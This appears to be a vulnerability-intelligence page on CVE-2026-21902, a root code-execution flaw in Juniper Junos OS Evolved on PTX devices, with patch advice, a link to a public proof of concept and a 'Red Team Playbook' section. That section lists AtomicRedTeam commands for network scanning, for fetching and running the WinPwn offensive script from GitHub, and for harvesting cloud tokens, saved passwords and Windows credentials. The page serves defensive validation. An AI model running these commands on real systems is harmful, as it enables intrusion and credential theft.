CVE-2026-21902
Overview
This vulnerability is an Incorrect Permission Assignment (CWE-732) affecting the On-Box Anomaly detection framework in Juniper Networks Junos OS Evolved on PTX Series devices. The root cause is that the anomaly detection service is exposed via an externally accessible port instead of being restricted to internal routing instances, allowing unauthorized network access. The affected component is the anomaly detection framework service, which is enabled by default without requiring explicit configuration.
Vulnerability Description
An Incorrect Permission Assignment for Critical Resource vulnerability in the On-Box Anomaly detection framework of Juniper Networks Junos OS Evolved on PTX Series allows an unauthenticated, network-based attacker to execute code as root. The On-Box Anomaly detection framework should only be reachable by other internal processes over the internal routing instance, but not over an externally exposed port. With the ability to access and manipulate the service to execute code as root a remote attacker can take complete control of the device. Please note that this service is enabled by default as no specific configuration is required. This issue affects Junos OS Evolved on PTX Series: * 25.4 versions before 25.4R1-S1-EVO, 25.4R2-EVO. This issue does not affect Junos OS Evolved versions before 25.4R1-EVO. This issue does not affect Junos OS.
Impact
An unauthenticated, remote attacker can exploit this vulnerability to execute code as root on affected PTX Series devices, gaining full control over the system. No user interaction or authentication is required, and the attack can be launched over the network. This enables complete device compromise, including potential disruption of network services and unauthorized access to sensitive data. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation and high impact on confidentiality, integrity, and availability.
Solution
Juniper Networks has released patches addressing this vulnerability in Junos OS Evolved on PTX Series starting with versions 25.4R1-S1-EVO and 25.4R2-EVO. Administrators should apply these updates promptly as detailed in the vendor advisory JSA107128 (https://supportportal.juniper.net/JSA107128). No additional configuration is required to enable the fix, as the service is enabled by default. Following the advisory ensures proper permission assignment and limits service exposure to internal processes only.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the On-Box Anomaly detection framework of Junos OS Evolved on PTX Series arises from an incorrect permission assignment for critical resources. This flaw permits unauthenticated, network-based attackers to execute code with root privileges, thereby compromising the integrity and confidentiality of the affected systems. The On-Box Anomaly detection framework is designed to monitor and analyze network traffic for unusual patterns, and it should only be accessible to internal processes via the internal routing instance. However, due to the misconfiguration, this service is inadvertently exposed through an externally accessible port, creating a significant security risk.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An adversary could leverage this flaw by sending crafted network packets to the exposed service, thereby gaining unauthorized access. Once inside, the attacker can execute arbitrary code as root, which grants them complete control over the device. This scenario is exacerbated by the fact that the service is enabled by default, requiring no specific configuration changes to become a target. Consequently, even organizations with limited security postures may find themselves vulnerable, as they may not have taken steps to restrict access to this critical service.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Junos OS Evolved for their network infrastructure. Successful exploitation could lead to unauthorized access to sensitive data, disruption of network services, and potential lateral movement within the organization's IT environment. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive customer information is compromised. Furthermore, the ability to manipulate network devices could facilitate broader attacks, including denial-of-service scenarios or the deployment of malware across the network.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should conduct a thorough inventory of their network devices to identify any running instances of the affected Junos OS Evolved versions. Regular vulnerability assessments and penetration testing can help uncover potential weaknesses before they are exploited. Additionally, organizations should restrict access to the On-Box Anomaly detection framework by employing network segmentation and firewall rules to limit exposure to only trusted internal processes. Updating to the latest patched versions of Junos OS Evolved is critical, as these updates address the permission assignment flaw and enhance overall system security.
In conclusion, the vulnerability within the On-Box Anomaly detection framework of Junos OS Evolved on PTX Series poses a significant threat to network security. Its potential for exploitation by unauthenticated attackers highlights the importance of proper configuration and access controls in safeguarding critical resources. Organizations must prioritize detection and mitigation strategies to protect their infrastructure from the severe consequences of such vulnerabilities. By staying informed and proactive, businesses can better defend against the evolving landscape of cybersecurity threats.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-21902, indicating increased adversary interest and potential reconnaissance efforts targeting the On-Box Anomaly detection framework in Junos OS Evolved on PTX Series devices. Although the EPSS score remains stable, the uptick in telemetry suggests that threat actors may be intensifying attempts to exploit the incorrect permission assignment vulnerability, potentially leveraging network-based access to execute code with root privileges. This development is significant for defenders as it underscores a growing risk of unauthorized root-level compromise via an externally exposed service that should be internally restricted. The absence of new public proof-of-concept exploits limits immediate exploitation risk; however, the increased activity signals that threat actors are actively probing for weaknesses, which could precede more sophisticated or widespread attacks. Consequently, the threat level should be considered elevated, warranting heightened vigilance in monitoring network traffic and anomalous behavior associated with the affected framework.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Juniper | Junos Os Evolved | 25.4 |
cpe:2.3:o:juniper:junos_os_evolved:25.4:r1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-JunosEvolved-CVE-2026-21902
|
watchtowrlabs | 4 | 0 | 2026-02-28 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-21902 |
| supportportal.juniper.net |
GitHub CVE
vendor-advisory
|
https://supportportal.juniper.net/JSA107128 |
| kb.juniper.net |
GitHub CVE
vendor-advisory
|
https://kb.juniper.net/JSA107128 |
| github.com |
NVD API
Product
|
https://github.com/watchtowrlabs/watchTowr-vs-JunosEvolved-CVE-2026-21902/blob/main/watchTowr-vs-JunosEvolved-CVE-2026-21902.py |